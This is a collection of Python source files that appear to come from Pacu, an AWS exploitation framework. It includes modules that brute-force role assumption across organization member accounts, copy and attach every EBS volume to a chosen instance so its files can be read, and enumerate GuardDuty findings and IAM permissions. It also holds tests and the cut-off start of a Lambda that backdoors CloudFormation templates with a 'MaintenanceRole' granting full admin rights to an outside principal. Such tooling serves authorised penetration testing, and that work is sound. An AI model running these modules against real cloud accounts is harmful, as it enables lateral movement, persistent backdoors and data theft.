    session.update(pacu_main.database, EC2=ec2_data)

    return summary_data


def summary(data, pacu_main):
    out = ''
    if 'volumes' in data:
        out += '  {} Volumes found\n'.format(data['volumes'])
    if 'snapshots' in data:
        out += '  {} Snapshots found\n'.format(data['snapshots'])
    if 'volumes_csv_path' in data:
        out += '  Unencrypted volume information written to:\n    {}\n'.format(data['volumes_csv_path'])
    if 'snapshots_csv_path' in data:
        out += '  Unencrypted snapshot information written to:\n    {}\n'.format(data['snapshots_csv_path'])
    if data['snapshot_permissions']:
        out += '  Snapshot Permissions: \n'
        out += '    {} Public snapshots found\n'.format(data['Public'])
        out += '    {} Private snapshots found\n'.format(data['Private'])
        out += '    {} Shared snapshots found\n'.format(data['Shared'])
        out += '      Snapshot permissions information written to: {}\n'.format(data['snapshot-permissions-path'])
    return out



import os
import re
import boto3
import moto
import pytest

from chalice.test import Client
from pacu.modules.cfn__resource_injection.cfn__resource_injection_lambda.app import app, add_role_dict, add_role_bytes, fetch, update


@pytest.fixture
def environ():
    os.environ['PRINCIPAL'] = 'asdf'


def test_add_role_dict(environ):
    cfn = {
        "AWSTemplateFormatVersion": "2010-09-09",
        "Description": "Test CloudFormation Template",
        "Globals": {},
        "Outputs": {},
        "Resources": {
            "OurBucket": {
                "Properties": {},
                "Type": "AWS::S3::Bucket"
            }
        }
    }

    assert {
               'AWSTemplateFormatVersion': '2010-09-09',
               'Description': 'Test CloudFormation Template',
               'Globals': {},
               'Outputs': {},
               'Resources': {
                   'MaintenanceRole': {
                       'Properties': {
                           'AssumeRolePolicyDocument': '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", '
                                                       '"Principal": {"AWS": "asdf"}, "Action": "sts:AssumeRole"}]}',
                           'Policies': [
                               {
                                   'PolicyDocument': {
                                       'Statement': [
                                           {
                                               'Action': '*',
                                               'Effect': 'Allow',
                                               'Resource': '*'
                                           }
                                       ],
                                       'Version': '2012-10-17',
                                   },
                                   'PolicyName': 'default',
                               }
                           ]
                       },
                       'Type': 'AWS::IAM::Role',
                   },
                   'OurBucket': {
                       'Properties': {},
                       'Type': 'AWS::S3::Bucket',
                   }
               }
           } == add_role_dict(cfn)


new_cfn_json = b"""
{
    "AWSTemplateFormatVersion": "2010-09-09",
    "Description": "Test CloudFormation Template",
    "Globals": {},
    "Outputs": {},
    "Resources": {
        "OurBucket": {
            "Properties": {},
            "Type": "AWS::S3::Bucket"
        }
    }
}
"""

modified_cfn_json = b"""
{
  "AWSTemplateFormatVersion": "2010-09-09",
  "Description": "Test CloudFormation Template",
  "Globals": {},
  "Outputs": {},
  "Resources": {
    "OurBucket": {
      "Properties": {},
      "Type": "AWS::S3::Bucket"
    },
    "MaintenanceRole": {
      "Type": "AWS::IAM::Role",
      "Properties": {
        "AssumeRolePolicyDocument": "{\\"Version\\": \\"2012-10-17\\", \\"Statement\\": [{\\"Effect\\": \\"Allow\\", \\"Principal\\": {\\"AWS\\": \\"asdf\\"}, \\"Action\\": \\"sts:AssumeRole\\"}]}",
        "Policies": [
          {
            "PolicyName": "default",
            "PolicyDocument": {
              "Version": "2012-10-17",
              "Statement": [
                {
                  "Effect": "Allow",
                  "Action": "*",
                  "Resource": "*"
                }
              ]
            }
          }
        ]
      }
    }
  }
}
"""

new_cfn_yaml = b"""
AWSTemplateFormatVersion: '2010-09-09'
Description: Test CloudFormation Template
Globals: {}
Outputs: {}
Resources:
  OurBucket:
    Properties: {}
    Type: 'AWS::S3::Bucket'
"""


def test_add_role_bytes_json(environ):
    add_role_bytes(new_cfn_json)


def test_add_role_bytes_yaml(environ):
    add_role_bytes(new_cfn_yaml)


@pytest.fixture
def upload_json(environ, s3):
    s3.create_bucket(Bucket='test-bucket')
    s3.put_object(Bucket='test-bucket', Key='test-key', Body=new_cfn_json)
    return 'test-bucket', 'test-key', new_cfn_json


@pytest.fixture
def aws_credentials():
    """Mocked AWS Credentials for moto."""
    os.environ['AWS_ACCESS_KEY_ID'] = 'testing'
    os.environ['AWS_SECRET_ACCESS_KEY'] = 'testing'
    os.environ['AWS_SECURITY_TOKEN'] = 'testing'
    os.environ['AWS_SESSION_TOKEN'] = 'testing'


@pytest.fixture(scope='function')
def s3(aws_credentials):
    with moto.mock_s3():
        yield boto3.client('s3', region_name='us-east-1')


def test_update(s3, upload_json):
    bucket, key, _ = upload_json[0], upload_json[1], upload_json[2]

    body = s3.get_object(Bucket=bucket, Key=key)['Body'].read()
    assert clean_json(new_cfn_json.decode()) == clean_json(body.decode())

    update(s3, bucket, key)

    body = s3.get_object(Bucket=bucket, Key=key)['Body'].read()
    assert clean_json(modified_cfn_json.decode()) == clean_json(body.decode())


def test_update_second_time(s3, upload_json):
    bucket, key, body = upload_json[0], upload_json[1], upload_json[2]
    update(s3, bucket, key)
    resp = s3.get_object(Bucket=bucket, Key=key)
    a = clean_json(modified_cfn_json.decode())
    b = clean_json(resp['Body'].read().decode())
    assert a == b


def clean_json(s: str):
    c = re.compile(r'\s')
    return c.sub('', s)



#!/usr/bin/env python3
import argparse
from botocore.exceptions import ClientError
import random, string

module_info = {
    # Name of the module (should be the same as the filename).
    'name': 'organizations__assume_role',

    # Name and any other notes about the author.
    'author': 'Scott (@WebbinRoot:/in/webbinroot/)',

    # Category of the module. Make sure the name matches an existing category.
    'category': 'LATERAL_MOVE',

    # One liner description of the module functionality. This shows up when a
    # user searches for modules.
    'one_liner': 'Tries to assume any roles in a member account in a given organization',

    # Full description about what the module does and how it works.
    'description': 'This module accepts a list of AWS accounts and possible role names to try assuming all roles. You can choose to specify accounts/roles to run it against, or just running the module will use the default role in organizations on whatever accounts it can gain from a call to list_accounts. Note the caller MUST have AssumeRole rights for this module to work correctly.',

    # A list of AWS services that the module utilizes during its execution.
    'services': ['Organizations'],

    # For prerequisite modules, try and see if any existing modules return the
    # data that is required for your module before writing that code yourself;
    # that way, session data can stay separated and modular.
    'prerequisite_modules': ['organizations__enum'],

    # External resources that the module depends on. Valid options are either
    # a GitHub URL (must end in .git), or a single file URL.
    'external_dependencies': [],

    # Module arguments to autocomplete when the user hits tab.
    'arguments_to_autocomplete': ['accounts','accounts-file','roles','roles-file'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
group_accounts = parser.add_mutually_exclusive_group()
group_roles = parser.add_mutually_exclusive_group()

group_accounts.add_argument('--accounts', required=False, nargs='+', default=None,  help='Pass in a list of accounts to try assuming, --accounts 1 2 3')
group_accounts.add_argument('--accounts-file', required=False, nargs=1, default=None, help="Pass in a filename containing a list of accounts to try assuming")
group_roles.add_argument('--roles', required = False, nargs = '+', default=None,  help='Pass in a list of roles to try assuming. If non are specified uses default OrganizationAccountAccessRole, --roles a b c')
group_roles.add_argument('--roles-file', required=False, nargs=1, default=None, help='Pass in a filename containing a list of roles to try assuming')


roles_list = []

def assume_role(args, client, role_arn):
    global roles_list
    try:
        resp = client.assume_role(
            RoleArn=role_arn,
            RoleSessionName=''.join(random.choice(string.ascii_letters) for _ in range(20)),
        )
        roles_list.append(role_arn)
        print("SUCCESS: " + role_arn)
        

    except ClientError as error:
        code = error.response['Error']['Code']
        if code == 'AccessDenied':
            print("FAILURE: "+role_arn)
        else:
            print('DEFAULT FAILURE: {}'.format(code))


# Main is the first function that is called when this module is executed.
def main(args, pacu_main):

    session = pacu_main.get_active_session()
    client = pacu_main.get_boto3_client('sts')

    ###### These can be removed if you are not using the function.
    args = parser.parse_args(args)
    print = pacu_main.print
    fetch_data = pacu_main.fetch_data
    ######

    accounts = []
    roles = ["OrganizationAccountAccessRole"]
    
    # If user did not specify an account to try brute forcing, then try pre-requisite
    if not args.accounts and not args.accounts_file:
        if fetch_data(['Organizations'], 'organizations__enum', '--accounts') is False:
            print("Prerequisite module was not run. Exiting...")
            return
        accounts = session.Organizations['Accounts']

    # Accounts Set
    if args.accounts:
        accounts = args.accounts
    elif args.accounts_file:
        f = open(args.accounts_file[0],"r")
        accounts = f.read().splitlines()
    
    # Roles Set
    if args.roles:
        roles = args.roles
    elif args.roles_file:
        f = open(args.roles_file[0],"r")
        roles = f.read().splitlines()

    # Go through each AWS account and each role in wordlist or default and try to assume it
    for account in accounts:

        # Accounts from internal Pacu database are dictionaries 
        if isinstance(account, dict) and "Id" in account:
            account = account["Id"]

        for role in roles:
            role_arn = "arn:aws:iam::"+str(account)+":role/"+str(role)
            assume_role(args, client, role_arn)


    # Make sure your main function returns whatever data you need to construct
    # a module summary string.
    data = roles_list
    return data

def summary(data, pacu_main):
    if len(data) == 0:
        return "No roles were found that could be assumed"
    else:
        summary = 'The following roles can be assumed as shown below:'
        for arn in data:
            summary = summary + "\nassume_role " + str(arn)
        return summary



#!/usr/bin/env python3
import argparse
import json
from colorama import Fore, Style
import os

from pacu.core.lib import strip_lines, downloads_dir

from policyuniverse.statement import Statement

module_info = {
    "name": "iam__enum_action_query",
    "author": "Dave Yesland (@daveysec)",
    "category": "ENUM",
    "one_liner": "Allows you to query enumerated user and role permissions.",
    "description": "This module allows you to query IAM permissions for users and roles and see what resources if any they have those permissions on. For example --query s3:get*,iam:create*.", # noqa
    "services": ["IAM"],
    "prerequisite_modules": ["iam__enum_permissions"],
    "external_dependencies": [],
    "arguments_to_autocomplete": [],
}

parser = argparse.ArgumentParser(description=module_info["description"])
parser.add_argument(
    "--query",
    required=True,
    help=strip_lines(
        """
    Permissions to query. One string like: s3:GetObject or s3:* or s3:GetObject,s3:PutObject.
"""
    ),
)
parser.add_argument(
    "--all-or-none",
    required=False,
    default=False,
    action="store_true",
    help=strip_lines(
        """
    This will check if all actions in the query are allowed, not just some of them, it will only print the principal and resources for those that allow all actions.
"""
    ),
)
parser.add_argument(
    "--role",
    required=False,
    help=strip_lines(
        """
    Filter a to a specific role.
"""
    ),
)
parser.add_argument(
    "--user",
    required=False,
    help=strip_lines(
        """
    Filter a to a specific user.
"""
    ),
)
parser.add_argument(
    "--folder",
    required=False,
    default=None,
    help=strip_lines(
        """
    A file path pointing to a folder full of JSON files containing policies and connections between users, groups,
    and/or roles in an AWS account. The module "iam__enum_permissions" with the "--all-users" flag outputs the exact
    format required for this feature to ~/.local/share/pacu/sessions/[current_session_name]/downloads/confirmed_permissions/.
"""
    ),
)


def main(args, pacu_main):
    args = parser.parse_args(args)
    print = pacu_main.print
    fetch_data = pacu_main.fetch_data

    class color:
        """
        Colorama color class
        Usage: print(color.red("This is red text"))
        Args: string (str): String to color
        """

        def red(string):
            return f"{Fore.RED}{string}{Style.RESET_ALL}"

        def green(string):
            return f"{Fore.GREEN}{string}{Style.RESET_ALL}"

        def yellow(string):
            return f"{Fore.YELLOW}{string}{Style.RESET_ALL}"

    if args.folder:
        iam_enum_folder = args.folder
    else:
        iam_enum_folder = "{}/confirmed_permissions/".format(downloads_dir())

    if os.path.isdir(iam_enum_folder) is False:
        print(
            f'{iam_enum_folder} not found! Maybe you have not run {module_info["prerequisite_modules"][module_info["prerequisite_modules"].index("iam__enum_permissions")]} yet...\n'
        )
        if (
            fetch_data(
                ["All users/roles permissions"],
                module_info["prerequisite_modules"][0],
                "--all-users --all-roles",
            )
            is False
        ):
            print("Pre-req module not run. Exiting...")
            return

    # List all the files in the iam_query_data directory
    # which is created by the iam__enum_permissions module
    files = os.listdir(iam_enum_folder)

    def filter_files(files, filter):
        """
        Filter a list of files based on a filter
        Args: files (list): list of files to filter
        Args: filter (string): filter to apply to the list of files
        returns: list: list of filtered files
        """
        filtered_files = []
        for file in files:
            if filter.lower() in file.lower():
                filtered_files.append(file)
        return filtered_files

    # If the user has specified a role or user to filter by
    # then only use the files that match that role or user
    filtered_files = []
    if args.role:
        for role in args.role.split(","):
            filtered_files += filter_files(files, f"{role}.json")
    if args.user:
        for user in args.user.split(","):
            filtered_files += filter_files(files, f"{user}.json")
    if filtered_files:
        files = filtered_files

    # Setup query
    query_actions = args.query.split(",")
    list_of_actions_to_check = Statement({"Action": query_actions}).actions_expanded

    # Loop through each file and parse the statements
    for file_name in files:

        with open(f"{iam_enum_folder}{file_name}", "r") as principal_file:
            principal = json.load(principal_file)

            # Get principal info
            principal_name = principal.get("RoleName", principal.get("UserName"))
            principal_type = "Role" if "RoleName" in principal else "User"

            # Check if the principal has the action
            for action in list_of_actions_to_check:
                # Check if the any queried actions are allowed for a principal
                if action in principal["Permissions"]["Allow"]:
                    # Print out the info for the principal with relation to
                    # the action that was queried
                    print(
                            f"({principal_type}) {color.green(principal_name)} can perform {color.green(action)} on these resources:"
                        )
                    for resource in principal["Permissions"]["Allow"][action]["Resources"]:
                        print(resource)

                    # If there are conditions on the Allow action, print them out
                    if principal["Permissions"]["Allow"][action]["Conditions"]:
                        print(color.yellow("With the following conditions:"))
                        for condition in principal["Permissions"]["Allow"][action]["Conditions"]:
                            print(condition)

                    # Check if there are any Deny rules for the action
                    # If there are, print them out
                    if action in principal["Permissions"]["Deny"]:
                        print(
                            color.red("If the resources are not included in:")
                        )
                        for resource in principal["Permissions"]["Deny"][action]["Resources"]:
                            print(resource)
                        if principal["Permissions"]["Deny"][action]["Conditions"]:
                            print(color.yellow("These Deny rules only apply if the following conditions are met:"))
                            for condition in principal["Permissions"]["Deny"][action]["Conditions"]:
                                print(condition)



#!/usr/bin/env python3
import argparse
from pathlib import Path

from botocore.exceptions import ClientError
import copy
import string
import random
import json
import math
import time

module_info = {
    'name': 'guardduty__list_findings',
    'author': 'Manas Bellani',
    'category': 'ENUM',
    'one_liner': 'Gets the guard-duty statistics and finding details from all Guard-duty detectors.',
    'description': (
        'This module lists all the GuardDuty Findings available from the AWS console for each identified detector. It '
        'requires that pre-req module has been run first to ensure that all detectors for which findings need to be pulled '
        'have been populated. The results are written to ~/.local/share/pacu/sessions/<session>/guardduty/.'
    ),
    'services': ['GuardDuty'],
    'prerequisite_modules': ['detection__enum_services'],
    'external_dependencies': [],
    'arguments_to_autocomplete': []
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])


def main(args, pacu_main):
    session = pacu_main.get_active_session()
    args = parser.parse_args(args)
    print = pacu_main.print
    input = pacu_main.input
    fetch_data = pacu_main.fetch_data
    get_regions = pacu_main.get_regions

    # Prepare output file to write guardduty findings results
    now = time.time()
    out_file = Path('sessions/{}/downloads/guardduty/list_findings_{}.json'.format(session.name, now))

    # Store all the data in this
    data = {
        'detectors': {},
        'findings': {},
        'finding_details': {},
        'severity_count_map': {}
    }

    # Get all the regions that GuardDuty runs in
    regions = get_regions('GuardDuty')

    # Get the list of all detectors
    if fetch_data(['GuardDuty', 'Detectors'], module_info['prerequisite_modules'][0], '--guard-duty') is False:
        print('Pre-req module failed.')
        return
    detectors = copy.deepcopy(session.GuardDuty['Detectors'])

    # Loop through each region for guardduty detectors
    for region in regions:
        client = pacu_main.get_boto3_client('guardduty', region)

        # Get the detectors for each region
        for detector in detectors:
            if detector['Region'] == region:
                detector_id = detector['Id']
                print(' ({}) Detector {}:'.format(region, detector_id))
                data['detectors'][detector_id] = region

                try:
                    # Get the statistics of number of findings
                    response = client.get_findings_statistics(
                        DetectorId=detector_id,
                        FindingStatisticTypes=['COUNT_BY_SEVERITY']
                    )

                    # Get the raw severity to count map
                    if 'FindingStatistics' in response and 'CountBySeverity' in response['FindingStatistics']:
                        severity_count_map = json.dumps(response['FindingStatistics']['CountBySeverity'])

                        # Print the severity map properly formatted
                        data['severity_count_map'][detector_id] = severity_count_map
                        print('    Obtained Guardduty severity to count map for detector id, {}:\n{}'.format(detector_id, severity_count_map))
                        print('        Guardduty values range between 0.1-8.9. Typically, 0.1-3.9 are LOW, 4.0-6.9 are MED, 7.0-8.9 are HIGH')
                        print('        Refer for more info: https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_findings.html#guardduty_findings-severity')
                    else:
                        data['severity_count_map'] = ''
                        print('    Something went wrong getting Guardduty stats for region: {}, detector: {}'.format(region, detector_id))
                        print('        Raw response: {}'.format(str(data)))

                    # Collect the finding IDs via multiple iterations
                    data['findings'][detector_id] = []
                    next_token = ''
                    i = 0
                    while i == 0 or next_token:
                        response = client.list_findings(
                            DetectorId=detector_id,
                            NextToken=next_token
                        )

                        # Parse finding IDs
                        if 'FindingIds' in response:
                            finding_ids = response['FindingIds']
                            data['findings'][detector_id].extend(finding_ids)

                        # Get the next token if available
                        if 'NextToken' in response:
                            next_token = response['NextToken']

                        # Next iteration
                        i += 1

                    # Display the user number of finding IDs collected
                    num_findings = len(data['findings'][detector_id])
                    if num_findings > 0:
                        print('Number of findings for detector_id, {}: {}'.format(detector_id, num_findings))
                        print('Getting more details about each finding')

                    # Determining number of iterations to use to get information
                    findings_set_len = 10
                    num_iters = math.ceil(num_findings/findings_set_len)
                    print('Number of iterations for detector_id, {} to get all findings: {}'.format(detector_id, num_iters))

                    # Get brief information on each of the findings obtained in
                    # bunch of 'findings_set_len' findings
                    data['finding_details'][detector_id] = []
                    for i in range(0, num_iters):
                        print('Iterating {}th time to get findings info for detector_id: {}'.format(
                                i+1,
                                detector_id
                            )
                        )

                        # Split findings to get into a group
                        lbound = i * findings_set_len
                        ubound = (i+1) * findings_set_len
                        findings_to_get = data['findings'][detector_id][lbound:ubound]

                        # Get more info about all the findings
                        response = client.get_findings(
                            DetectorId=detector_id,
                            FindingIds=findings_to_get
                        )

                        # Parse all the findings
                        if 'Findings' in response:
                            for finding_detail in response['Findings']:
                                if finding_detail:
                                    finding_id = finding_detail['Id'],
                                    data['finding_details'][detector_id].append(
                                        {
                                            'id': finding_id[0],
                                            'type': finding_detail['Type'],
                                            'title': finding_detail['Title'],
                                            'sev': finding_detail['Severity'],
                                            'count': finding_detail['Service']['Count'],
                                            'detector': detector_id,
                                            'region': region
                                        }
                                    )

                except Exception as error:
                    print('    Generic Error collecting GuardDuty stats for region: {}, detector: {}'.format(region, detector_id))
                    print('        Error: {}, {}'.format(error.__class__, str(error)))

    print("Writing ALL findings to JSON output file: {}".format(str(out_file)))
    out_file.parent.mkdir(exist_ok=True, parents=True)
    out_file.write_text(json.dumps(data, indent=4, default=str))

    return data


def summary(data, pacu_main):
    msg = 'Stats presented for {} GuardDuty Detector(s).\n'.format(len(data['detectors']))
    for detector_id, finding_ids in data['findings'].items():
        num_findings = len(finding_ids)
        detector_region = data['detectors'][detector_id]
        msg += 'Number of findings presented for detector, {}, in region, {}, is: {}\n'.format(
            detector_id,
            detector_region,
            num_findings
        )

    return msg




#!/usr/bin/env python3
"""Module for ebs_snapshot_explorer"""
import argparse
from copy import deepcopy
import json
from pathlib import Path

from botocore.exceptions import ClientError

from pacu.core.lib import session_dir

module_info = {
    'name': 'ebs__explore_snapshots',
    'author': 'Alexander Morgenstern alexander.morgenstern@rhinosecuritylabs.com',
    'category': 'EXPLOIT',
    'one_liner': 'Restores and attaches EBS volumes/snapshots to an EC2 instance of your choice.',
    'description': 'This module will cycle through existing EBS volumes and create snapshots of them, then restore those '
                   'snapshots and existing snapshots to new EBS volumes, which will then be attached to the supplied EC2 '
                   'instance for you to mount. This will give you access to the files on the various volumes, where you can '
                   'then look for sensitive information. Afterwards, it will cleanup the created volumes and snapshots by '
                   'detaching them from your instance and removing them from the AWS account.',
    'services': ['EC2'],
    'prerequisite_modules': ['ec2__enum', 'ebs__enum_volumes_snapshots'],
    'arguments_to_autocomplete': ['--instance-id', '--zone'],
}

parser = argparse.ArgumentParser(add_help=False, description=module_info['description'])
parser.add_argument(
    '--instance-id',
    required=True,
    help='InstanceId of instance to target'
)
parser.add_argument(
    '--zone',
    required=True,
    help='Availability zone of instance to target'
)

SET_COUNT = 10


def load_volumes(pacu, client, instance_id, volume_ids):
    """Loads volumes on an instance.

    Args:
        client (boto3.client): client to interact with AWS
        print (func): Overwritten built-in print function
        input (func): Overwritten built-in input function
        instance_id (str): instance_id to attach volumes to
        volume_ids (list): list of volume_ids to attach to the instance.
    Returns:
        bool: True if all volumes were successfully attached.
    """

    # load volume set
    set_index = 0

    while set_index < len(volume_ids):
        current_volume_set = volume_ids[set_index:set_index + SET_COUNT]
        waiter = client.get_waiter('volume_available')
        waiter.wait(VolumeIds=current_volume_set)
        attached = modify_volume_list(
            pacu, client, 'attach_volume', instance_id, current_volume_set
        )
        if not attached:
            pacu.print(' Volume attachment failed')
            pacu.print(' Exiting...')
            running = False

        while True:
            response = pacu.input('    Load next set of volumes? (y/n) ')
            if response.lower() == 'y':
                running = True
                break
            elif response.lower() == 'n':
                running = False
                break

        detached = modify_volume_list(
            pacu, client, 'detach_volume', instance_id, current_volume_set
        )
        if not detached:
            pacu.print(' Volume detachment failed')
            pacu.print(' Exiting...')
            running = False
        waiter.wait(VolumeIds=current_volume_set)
        set_index += SET_COUNT
        if not running:
            break
    cleanup(client)
    return True


def modify_volume_list(pacu, client, func, instance_id, volume_id_list):
    """Helper function to load volumes on an instance to not overload the
    instance.

    Args:
        client (boto3.client): client to interact with AWS
        print (func): Overwritten built-in print function
        func (str): Function sname to modify_volume_list
        instance_id (str): instance_id to attach volumes to
        volume_ids (list): list of volume_ids to (de)attach to the instance.
    Returns:
        bool: True if the volumes were successfully modified.
    """
    available_devices_iterator = iter(get_valid_devices(pacu, instance_id))
    for volume_id in volume_id_list:
        try:
            kwargs = {
                'InstanceId': instance_id,
                'VolumeId': volume_id
            }
            if func == 'attach_volume':
                kwargs['Device'] = next(available_devices_iterator)
            caller = getattr(client, func)
            caller(**kwargs)
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'UnauthorizedOperation':
                pacu.print('  FAILURE MISSING AWS PERMISSIONS')
            else:
                pacu.print(error)
            return False
    return True


def get_valid_devices(pacu, instance_id):
    """Returns the next device mapping available

    Args:
        client (boto3.client): Client that gets the current block device mappings
        instance (str): InstanceId to get curretn block device mappings
    Returns:
        str: Returns next mapping in form of /dev/xvd[base], otherwise /dev/xvdzz

    """
    instance = [instance for instance in get_instances(pacu) if instance['InstanceId'] == instance_id]
    # TODO: If KeyError is raised here it's likely because ec2_enum needs to be run again
    mappings = instance[0]['BlockDeviceMappings']
    current_mappings = [device['DeviceName'] for device in mappings]
    last_mapping = sorted(current_mappings)[-1]
    available_devices = [get_valid_device(last_mapping)]
    for _ in range(SET_COUNT):
        available_devices.append(get_valid_device(available_devices[-1]))
    return available_devices


def get_valid_device(previous_device):
    """Helper function that returns the next device given a previous device"""
    return previous_device[:-1] + next_char(previous_device[-1])


def next_char(char):
    """Gets the next sequential character

    Args:
        char (str): Character to increment
    Returns:
        str: Incremented passed char
    """
    out = chr(ord(char) + 1)
    return out if out != '{' else 'aa'


def get_instances(pacu):
    """Returns snapshots given an AWS region
    Args:
        pacu (Main): Reference to Pacu
    Returns:
        list: List of Instances.
    """
    ec2_data = deepcopy(pacu.get_active_session().EC2)
    if 'Instances' not in ec2_data:
        fields = ['EC2', 'Instances']
        module = module_info['prerequisite_modules'][0]
        args = '--instances'
        fetched_ec2_instances = pacu.fetch_data(fields, module, args)
        if fetched_ec2_instances is False:
            return []
        instance_data = deepcopy(pacu.get_active_session().EC2)
        return instance_data['Instances']
    return ec2_data['Instances']


def get_snapshots(pacu):
    """Returns snapshots given an AWS region
    Args:
        pacu (Main): Reference to Pacu
    Returns:
        list: List of Snapshots.
    """
    ec2_data = deepcopy(pacu.get_active_session().EC2)
    if 'Snapshots' not in ec2_data or not ec2_data['Snapshots']:
        fields = ['EC2', 'Snapshots']
        module = module_info['prerequisite_modules'][1]
        args = '--snaps'
        fetched_snapshots = pacu.fetch_data(fields, module, args)
        if fetched_snapshots is False:
            return []
        snap_data = deepcopy(pacu.get_active_session().EC2)
        return snap_data['Snapshots']
    return ec2_data['Snapshots']


def get_volumes(pacu):
    """Returns volumes given an AWS region
    Args:
        pacu (Main): Reference to Pacu
    Returns:
        dict: Mapping regions to corresponding list of volume_ids.
    """
    ec2_data = deepcopy(pacu.get_active_session().EC2)
    if 'Volumes' not in ec2_data or not ec2_data['Volumes']:
        pacu.print('Fetching Volume data...')
        fields = ['EC2', 'Volumes']
        module = module_info['prerequisite_modules'][1]
        args = '--vols'
        fetched_volumes = pacu.fetch_data(fields, module, args)
        if fetched_volumes is False:
            return []
        vol_data = deepcopy(pacu.get_active_session().EC2)
        return vol_data['Volumes']
    return ec2_data['Volumes']


def generate_volumes_from_snapshots(client, snapshots, zone):
    """Returns a list of generated volumes"""
    volume_ids = []
    waiter = client.get_waiter('snapshot_completed')
    waiter.wait(SnapshotIds=snapshots)
    for snapshot in snapshots:
        response = client.create_volume(SnapshotId=snapshot, AvailabilityZone=zone)
        volume_ids.append(response['VolumeId'])
    store_temp_data({'volumes': volume_ids})
    return volume_ids


def generate_snapshots_from_volumes(client, volume_ids):
    """Returns a list of generated snapshots from volumes"""
    snapshot_ids = []
    for volume in volume_ids:
        response = client.create_snapshot(VolumeId=volume)
        snapshot_ids.append(response['SnapshotId'])

    store_temp_data({'snapshots': snapshot_ids})
    return snapshot_ids


def delete_volumes(client, volumes):
    """Deletes a given list of volumes

    If the volume is in use, the volume is forcibly detached because this module
    only deals with temporary copies so data integrity is not a high priority when
    a volume is ready to be detatched. After the volume is forcibly detatched, the
    volume will be deleted after the detaching operation finishes.
    """
    failed_volumes = []
    for volume in volumes:
        try:
            client.delete_volume(VolumeId=volume)
        except ClientError as error:
            code = error.response['Error']['Code']
            if code == 'VolumeInUse':
                client.detach_volume(
                    VolumeId=volume,
                    Force=True)
                waiter = client.get_waiter('volume_available')
                waiter.wait(VolumeIds=[volume])
                client.delete_volume(VolumeId=volume)
                continue
            failed_volumes.append(volume)
    return failed_volumes


def delete_snapshots(client, snapshots):
    """Deletes a given list of snapshots"""
    failed_snapshots = []
    for snapshot in snapshots:
        try:
            client.delete_snapshot(SnapshotId=snapshot)
        except ClientError:
            failed_snapshots.append(snapshot)
    return failed_snapshots


def cleanup(client):
    """Cleans up the temporary snapshots and volumes created during this
    modules execution
    """
    new_data = {}
    success = True
    temp_file = session_dir()/'modules'/module_info['name']/ 'temp.json'
    if temp_file.is_file():
        with temp_file.open('r') as file:
            data = json.load(file)
            if 'snapshots' in data:
                new_data['snapshots'] = delete_snapshots(client, data['snapshots'])
            if 'volumes' in data:
                new_data['volumes'] = delete_volumes(client, data['volumes'])
        if 'volumes' in new_data and new_data['volumes']:
            print('  Failed to delete volumes: {}'.format(new_data['volumes']))
            success = False
        if 'snapshots' in new_data and new_data['snapshots']:
            print('  Failed to delete snapshots: {}'.format(new_data['snapshots']))
            success = False
        store_temp_data(new_data)
        if success:
            temp_file.unlink()
    return success


def store_temp_data(data):
    """Stores temporary data in a JSON file"""
    temp_file = session_dir()/'modules'/module_info['name']/ 'temp.json'
    if temp_file.exists():
        with temp_file.open('r') as json_file:
            existing_data = json.load(json_file)
            data.update(existing_data)
    with temp_file.open('w+') as json_file:
        json.dump(data, json_file)


def main(args, pacu):
    """Main module function, called from Pacu"""
    summary_data = {}
    instance_id = parser.parse_args(args).instance_id
    zone = parser.parse_args(args).zone
    region = zone[:-1]
    client = pacu.get_boto3_client('ec2', region)

    if not cleanup(client):
        pacu.print('  Cleanup failed')
        return summary_data

    snapshots = [snap['SnapshotId'] for snap in get_snapshots(pacu) if snap['Region'] == region]
    volumes = [vol['VolumeId'] for vol in get_volumes(pacu) if vol['Region'] == region]
    summary_data.update({'snapshots': len(snapshots), 'volumes': len(volumes)})

    pacu.print('  Attaching volumes...')
    temp_snaps = generate_snapshots_from_volumes(client, volumes)
    temp_volumes = generate_volumes_from_snapshots(client, temp_snaps, zone)
    load_volumes(pacu, client, instance_id, temp_volumes)
    pacu.print('  Finished attaching volumes...')

    pacu.print('  Attaching volumes from existing snapshots...')
    temp_volumes = generate_volumes_from_snapshots(client, snapshots, zone)
    load_volumes(pacu, client, instance_id, temp_volumes)
    pacu.print('  Finished attaching existing snapshot volumes...')

    return summary_data


def summary(data, pacu):
    """Returns a formatted string based on passed data."""
    out = ''
    if 'snapshots' in data:
        out += '  {} Snapshots loaded\n'.format(data['snapshots'])
    if 'volumes' in data:
        out += '  {} Volumes loaded\n'.format(data['volumes'])
    if not out:
        return '  No volumes were loaded\n'
    return out



#!/usr/bin/env python3
import argparse
from pacu.utils import decode_accesskey_id

module_info = {
    'name': 'iam__decode_accesskey_id',
    'author': 'Rhino Security Labs',
    'category': 'enum',
    'one_liner': 'This module decodes an access key ID to get the AWS account ID. Based on: https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489',
    'description': 'This module decodes an access key ID to get the AWS account ID without making and AWS API calls. Based on: https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489',
    'services': ['IAM'],
    'prerequisite_modules': [],
    'external_dependencies': [],
    'arguments_to_autocomplete': [],
}

parser = argparse.ArgumentParser(add_help=True, description=module_info['description'])

parser.add_argument('access_key_id', nargs='?', default='', help='The access key ID to decode. If not provided, the current access key ID for the current profile will be used.')


def main(args, pacu_main):

    key_info = pacu_main.key_info
    args = parser.parse_args(args)

    user = key_info()

    if args.access_key_id:
        accesskey_id = args.access_key_id
    else:
        accesskey_id = user['AccessKeyId']

    data = decode_accesskey_id(accesskey_id)
    return data


def summary(data, pacu_main):
    return f"Account ID: {data}"



import enum
import json
import os

from chalice import Chalice
from chalice.app import S3Event

import boto3
import yaml
from typing import TYPE_CHECKING


app = Chalice(app_name="cfn__resource_injection")


class CfnType(enum.Enum):
    YAML = 0
    JSON = 1


# The Role name is used to check if the lambda has already updated the template. It's important to ensure this doesn't
# break, if it does the lambda may end up endlessly triggering itself.
# TODO: Figure out a better way to check if a notification is for an already updated file.
BACKDOORED_IAM_ROLE_NAME = b'MaintenanceRole'

if TYPE_CHECKING:
    import mypy_boto3_s3

sess = boto3.session.Session(
    aws_access_key_id=os.getenv('S3_AWS_ACCESS_KEY_ID'),
    aws_secret_access_key=os.getenv('S3_AWS_SECRET_ACCESS_KEY'),
